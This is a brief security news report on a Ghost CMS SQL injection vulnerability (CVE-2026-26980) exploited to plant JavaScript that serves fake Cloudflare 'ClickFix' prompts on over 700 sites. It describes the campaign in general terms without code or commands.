Ghost CMS Vulnerability Exploited in Large-Scale ClickFix Campaign Affecting Over 700 Domains
A critical SQL injection vulnerability in Ghost CMS, identified as CVE-2026-26980, is being exploited in a large-scale campaign. The attack involves injecting malicious JavaScript code that triggers ClickFix attack flows. Discovered by XLab threat intelligence researchers at Qianxin, the campaign has impacted over 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs. The vulnerability affects Ghost versions 3.24.0 through 6.19.0, allowing unauthenticated attackers to access website databases and admin API keys. Despite a fix released in February 2026, many sites have not updated, leaving them vulnerable. Attackers use stolen admin API keys to inject malicious JavaScript into articles, which then fetches second-stage code from the attacker’s infrastructure. This code serves a fake Cloudflare prompt to visitors, leading to further exploitation. 
